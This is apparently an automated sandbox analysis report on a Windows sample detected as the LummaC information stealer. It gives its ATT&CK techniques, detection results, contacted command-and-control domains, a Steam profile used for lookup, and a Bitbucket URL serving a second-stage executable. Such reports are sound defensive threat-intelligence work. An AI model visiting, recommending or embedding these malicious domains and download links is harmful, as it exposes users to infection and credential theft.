                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\Documents\SQRKHNBNYNJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\EI3TafelpV.exeDirectory queried: number of queries: 1001
                Source: Yara matchFile source: 00000000.00000003.1569669854.0000000001190000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1569789872.0000000001198000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: EI3TafelpV.exe PID: 7524, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: EI3TafelpV.exe PID: 7524, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		2
                Process Injection                		34
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		751
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		11
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		2
                Process Injection                		LSASS Memory34
                Virtualization/Sandbox Evasion                		Remote Desktop Protocol41
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager2
                Process Discovery                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                Obfuscated Files or Information                		NTDS2
                File and Directory Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets223
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                EI3TafelpV.exe57%VirustotalBrowse
                EI3TafelpV.exe50%ReversingLabsWin32.Infostealer.Tinba
                EI3TafelpV.exe100%AviraTR/Crypt.TPM.Gen
                EI3TafelpV.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                necklacebudi.lat0%URL Reputationsafe
                necklacebudi.lat0%URL Reputationsafe
                sustainskelet.lat0%URL Reputationsafe
                sustainskelet.lat0%URL Reputationsafe
                crosshuaht.lat0%URL Reputationsafe
                crosshuaht.lat0%URL Reputationsafe
                energyaffai.lat0%URL Reputationsafe

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                		52.216.41.233
                		truefalse
                  		high
                  bitbucket.org
                  		185.166.143.49
                  		truefalse
                    		high
                    steamcommunity.com
                    		23.55.153.106
                    		truefalse
                      		high
                      lev-tolstoi.com
                      		172.67.157.254
                      		truefalse
                        		high
                        bbuseruploads.s3.amazonaws.com
                        		unknown
                        		unknownfalse
                          		high
                          sweepyribs.lat
                          		unknown
                          		unknownfalse
                            		high
                            necklacebudi.lat
                            		unknown
                            		unknowntrue
                            • 0%, URL Reputation
                            • 0%, URL Reputation
                            		unknown
                            sustainskelet.lat
                            		unknown
                            		unknowntrue
                            • 0%, URL Reputation
                            • 0%, URL Reputation
                            		unknown
                            crosshuaht.lat
                            		unknown
                            		unknowntrue
                            • 0%, URL Reputation
                            • 0%, URL Reputation
                            		unknown
                            rapeflowwj.lat
                            		unknown
                            		unknownfalse
                              		high
                              grannyejh.lat
                              		unknown
                              		unknownfalse
                                		high
                                aspecteirs.lat
                                		unknown
                                		unknownfalse
                                  		high
                                  discokeyus.lat
                                  		unknown
                                  		unknownfalse
                                    		high
                                    energyaffai.lat
                                    		unknown
                                    		unknowntrue
                                    • 0%, URL Reputation
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    aspecteirs.latfalse
                                      		high
                                      sweepyribs.latfalse
                                        		high
                                        sustainskelet.latfalse
                                          		high
                                          rapeflowwj.latfalse
                                            		high
                                            https://steamcommunity.com/profiles/76561199724331900false
                                              		high
                                              energyaffai.latfalse
                                                		high
                                                https://lev-tolstoi.com/apifalse
                                                  		high
                                                  grannyejh.latfalse
                                                    		high
                                                    necklacebudi.latfalse
                                                      		high
                                                      https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefalse
                                                        		high
                                                        crosshuaht.latfalse
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/chrome_newtabEI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://duckduckgo.com/ac/?q=EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://lev-tolstoi.com/piSEI3TafelpV.exe, 00000000.00000002.2028252194.0000000001102000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://steamcommunity.com/?subsection=broadcastsEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://cdn.cookielawEI3TafelpV.exe, 00000000.00000002.2028252194.0000000001133000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://store.steampowered.com/subscriber_agreement/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEEEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.valvesoftware.com/legal.htmEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amp;l=enEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://store.steampowereuEI3TafelpV.exe, 00000000.00000003.1596624552.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1569669854.0000000001190000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1569789872.0000000001198000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2028909755.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1613625094.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1593153175.000000000119F000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&ctaEI3TafelpV.exe, 00000000.00000003.1540914054.0000000005AC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://aui-cdn.atlassian.com/EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://lev-tolstoi.com/lEI3TafelpV.exe, 00000000.00000003.1596624552.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1593153175.000000000119F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&amp;l=englEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englisEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://lev-tolstoi.com/eEI3TafelpV.exe, 00000000.00000003.1596624552.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1593153175.000000000119F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://bitbucket.org/EI3TafelpV.exe, 00000000.00000002.2028909755.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netEI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://lev-tolstoi.com/EI3TafelpV.exe, 00000000.00000003.1467791586.0000000001141000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1513926322.0000000005AA8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://store.steampowered.com/privacy_agreement/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://store.steampowered.com/points/shop/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://crl.rootca1.amazontrust.com/rootca1.crl0EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://lev-tolstoi.com/rsmEI3TafelpV.exe, 00000000.00000002.2028909755.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1613625094.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              http://ocsp.rootca1.amazontrust.com0:EI3TafelpV.exe, 00000000.00000003.1539053986.0000000005AE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://nsis.sf.net/NSIS_ErrorErrorEI3TafelpV.exe, 00000000.00000003.1758406798.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2032287957.0000000006369000.00000002.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758335613.0000000005B68000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AAD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.ecosia.org/newtab/EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://steamcommunity.com/profiles/76561199724331900/inventory/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brEI3TafelpV.exe, 00000000.00000003.1540566640.0000000005D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.EI3TafelpV.exe, 00000000.00000003.1540914054.0000000005AC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://store.steampowered.com/privacy_agreement/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://lev-tolstoi.com/es-EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeuzEI3TafelpV.exe, 00000000.00000002.2028252194.0000000001102000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampcEI3TafelpV.exe, 00000000.00000003.1596624552.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1569669854.0000000001190000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1569789872.0000000001198000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2028909755.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1613625094.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1593153175.000000000119F000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netEI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://cdn.cookielaw.org/EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgEI3TafelpV.exe, 00000000.00000003.1540914054.0000000005AC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiEI3TafelpV.exe, 00000000.00000003.1540914054.0000000005AC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/about/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://steamcommunity.com/my/wishlist/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-EI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://lev-tolstoi.com/esEI3TafelpV.exe, 00000000.00000003.1596624552.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000002.2028909755.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1613625094.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1601152613.00000000011A1000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1593153175.000000000119F000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758765550.000000000119C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900#EI3TafelpV.exe, 00000000.00000003.1467791586.0000000001102000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://help.steampowered.com/en/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://steamcommunity.com/market/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://store.steampowered.com/news/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp;l=eEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=EI3TafelpV.exe, 00000000.00000003.1490755306.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490934152.0000000005AE3000.00000004.00000800.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1490831175.0000000005AE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://store.steampowered.com/subscriber_agreement/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1467791586.00000000010FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5EI3TafelpV.exe, 00000000.00000003.1540914054.0000000005AC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netEI3TafelpV.exe, 00000000.00000003.1758611968.0000000005AC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeeEI3TafelpV.exe, 00000000.00000002.2028665716.000000000113E000.00000004.00000020.00020000.00000000.sdmp, EI3TafelpV.exe, 00000000.00000003.1758980695.000000000113D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://steamcommunity.com/discussions/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://store.steampowered.com/stats/EI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aEI3TafelpV.exe, 00000000.00000003.1467751408.0000000001191000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
